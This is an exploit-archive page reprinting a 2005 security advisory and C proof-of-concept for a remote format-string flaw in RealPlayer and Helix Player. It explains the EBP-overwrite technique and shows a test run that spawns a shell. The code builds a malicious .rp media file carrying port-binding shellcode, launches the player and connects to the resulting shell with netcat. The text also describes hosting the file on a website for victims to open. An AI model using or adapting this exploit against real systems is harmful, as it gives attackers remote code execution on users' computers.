Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090022

Below is a copy:

 /*
  ************************************************************************************ \
*****************************  $ An open security advisory #13 - RealPlayer and Helix \
                Player Remote Format String Exploit
  ************************************************************************************ \
*****************************  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: September 26th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Remote
  ************************************************************************************ \
*****************************  $ This advisory and/or proof of concept code must not \
                be used for commercial gain.
  ************************************************************************************ \
*****************************

  UNIX RealPlayer && Helix Player
  http://real.com
  http://helixcommunity.org

  "The Helix Player is the Helix Community's open source media player for consumers. \
It is being developed  to have a rich and usable graphical interface and support a \
variety of open media formats like Ogg Vorbis,  Theora etc. 
  The RealPlayer for Linux is built on top of the Helix Player for Linux and includes \
support for several  non-open source components including RealAudio/RealVideo, MP3 \
etc."

  There is a remotly exploitable format string vulnerability in the latest Helix \
Media Player suit that will  allow an attacker the possibility to execute malicious \
code on a victims computer. The exploit code will  execute a remote shell under the \
permissions of the user running the media player, and effects all versions  of \
RealPlayer and Helix Player.

  The bug is exploitable by abusing media, including .rp (relpix)and .rt (realtext) \
file formats. Although  others may be effected I stick to realpix file format for \
this advisory.

  Almost all media file input is placed on the heap, so it's not possible to just pop \
our way to a supplied  string like with a normal stack based format bug, as such we \
can't directly modify GOT, DTORS, etc. leaving  us limited to what we can do.

  There are several places where we can control the flow of execution:

       popN - call *0x04(eax) - eax is controlled
       popN+N - call *0x20(eax) - eax is controlled
       popN+NN - call *0x100(edx) - edx is controlled
       popN+NNN - ebp - ebp is controlled
       popN+NNNN - eip - eip is controlled
       ....

  however since we are limited to the size of the value that can be written, it \
doesn't seem possible to  point at a known good location directly. Since our \
shellcode is always mapped via the .rp file between  0x0822**** - 0x082f**** and with \
control of one pointer at a time usually, we can not reach the LSB, we  are toast.

  In a phrack paper, Riq talks about using sections of the base pointer to create a 4 \
byte pointer by  chaining EBP like so:

  [Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP]

  And can be manipulated something like so:

  --------     --------     --------
  Frame 10     Frame 11     Frame 12
  --------     --------     --------
                1|------------\/
  [LSBMSB]     [LSBMSB]--   [41414141]
      2|____________^  3|__________^ 

  Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP \
pointing at 0x00000000.

  So what else can I do?

  How about use the fact the file being played is under my control and only the MSB \
needs overwritten. This  solves the problem with the size of the valaue I can write. \
It is possible to modify the MSB of an EBP  that is reachable, eventually leading to \
EIP pointing at some good location after "mov %ebp,%esp" happens,  resulting in the \
execution of our shellcode.

1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp
2-> Overwrite EBP MSB with the address of the file location on the stack
3-> EBP is moved to ESP
4-> EIP is changed to ESP value
5-> EIP is owned, shell is spawned

  Granted this is not a stable method as the user can freely manipulate their \
environment, and we use the  file name, which is stored in an environment variable to \
trampoline us to the shellcode. However my goal  here is not to create a worm but a \
proof-of-concept  :p 

  The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in \
/usr/local/RealPlayer  and run as shown below.

  Sample local run:

  Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold

  Window 1:
  ---------
  [email protected]:~$ netstat -an --ip
  Active Internet connections (servers and established)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
  tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
  tcp        0      0 192.168.88.133:22       192.168.88.1:2080       ESTABLISHED
  udp        0      0 0.0.0.0:68              0.0.0.0:*
  [email protected]:~$ ./helix4real

  Remote format string exploit POC for UNIX RealPlayer && HelixPlayer
  Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version
  by c0ntex || [email protected] || http://www.open-security.org

  [-] Creating file [VY~Ò.rp]
  [-] Using [148] stack pops
  [-] Modifying EBP MSB with value [64105]
  [-] Completed creation of test file!
  [-] Executing RealPlayer now...
  [-] Connecting to shell in 10 seconds
  ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** 

  (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to \
pango_layout_set_text()

  (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to \
pango_layout_set_text()

  ps -ef | tail -12;
  ...
  c0ntex    1631  1624  0 01:10 pts/2    00:00:00 /bin/sh /usr/bin/realplay \
./VYF&(?.rp  c0ntex    1636  1631  4 01:10 pts/2    00:00:02 /bin//sh
  c0ntex    1637  1636  0 01:10 pts/2    00:00:00           ?   ²ÿ¿f   ? ?\    ?   ? \
.rp  c0ntex    1638  1637  0 01:10 pts/2    00:00:00           ?   ²ÿ¿f   ? ?\    ?  \
?       .rp  c0ntex    1639  1636  0 01:10 pts/2    00:00:00 \
/usr/local/RealPlayer/realplay.bin ./VYF&(?.rp  c0ntex    1640  1636  0 01:10 pts/2   \
00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp  c0ntex    1641  1637  0 \
01:10 pts/2    00:00:00           ?   ²ÿ¿f   ? ?\    ?   ?       .rp  c0ntex    1642 \
1637  0 01:10 pts/2    00:00:00           ?   ²ÿ¿f   ? ?\    ?   ?       .rp  c0ntex \
                1643  1637  0 01:10 pts/2    00:00:00           ?   ²ÿ¿f   ? ?\    ? \
                ?       .rp
  ...

  To exploit this remotly, a user just needs to place the created file on a web site \
and provide a link so  users can click the file, launching RealPlayer and exploiting \
the vulnerability.

  Real have been duely informed about this issue and are fixing. Sadly though, it \
seems someone is trying to  pinch my research, as such I have been forced to release \
this advisory sooner than hoped. Until Real get  a new release out, do not play \
untrusted media with RealPlayer or HelixPlayer. Sorry Real.com!

  Moral of the story, don't talk about personal research on IRC. Thank you \
plagiarizers.

  PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ \
http://www.open-security.org/adv.xml  is now available.

 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER          10000
#define EBPMSB          64105
#define HOST            "localhost"
#define NETCAT          "/bin/nc"
#define NOPS            0x90
#define STACKPOP        148
#define VULN            "/usr/local/RealPlayer/realplay"

char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
                "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
                "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
                "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
                "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
                "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
                "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
                "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
                "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
                "\xe1\xcd\x80";


int
filegen(char *shellcode)
{
     FILE *rp;

     printf("[-] Creating file [%s]\n", filename);

     rp = fopen(filename, "w");
     if(!rp) {
           puts("[!] Could not fopen file!");
           free(shellcode);
           return(EXIT_FAILURE);
     }

     printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", \
STACKPOP, EBPMSB);

     fprintf(rp,
                     "<imfl>\n"
                     "<head\n"
                     "duration=\"1:33.7\"\n"
                     "timeformat=\"dd:hh:mm:ss.xyz\"\n"
                     "preroll=\"1:33.7\"\n"
                     "bitrate=\"1337\"\n"
                     "width=\"69\"\n"
                     "height=\"69\"\n"
                     "aspect=\"\"\n"
                     "url=\"http://www.open-security.org\"/>\n"
                     "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
                     "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
                     "</imfl>", EBPMSB, STACKPOP, shellcode);
      fclose(rp);

      free(shellcode); shellcode = NULL;

      return(EXIT_SUCCESS);
}


int
main(int argc, char **argv)
{
     char *shellcode = NULL;

     puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
     puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
     puts("by c0ntex || [email protected] || http://www.open-security.org\n");

     shellcode = (char *)malloc(BUFFER);
     if(!shellcode) {
           puts("[!] Could not malloc");
           return(EXIT_FAILURE);
     }

     memset(shellcode, NOPS, BUFFER);
     memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
     shellcode[BUFFER] = '\0';

     filegen(shellcode);

     puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

     switch(fork()) {
            case -1:
                    puts("[!] Could not fork off, bailing!");
                    return(EXIT_FAILURE);
            case 0:
                    if(execl(VULN, "realplay", filename, NULL) <0) {
                            puts("[!] Could not execute realplayer... :(");
                            return(EXIT_FAILURE);
                    }
     }

     puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON \
REALPLAYER WINDOW **");  sleep(10);

     if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
            puts("[!] Could not connect, check the core file!");
            return(EXIT_FAILURE);
     }

     return(EXIT_SUCCESS);
}

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.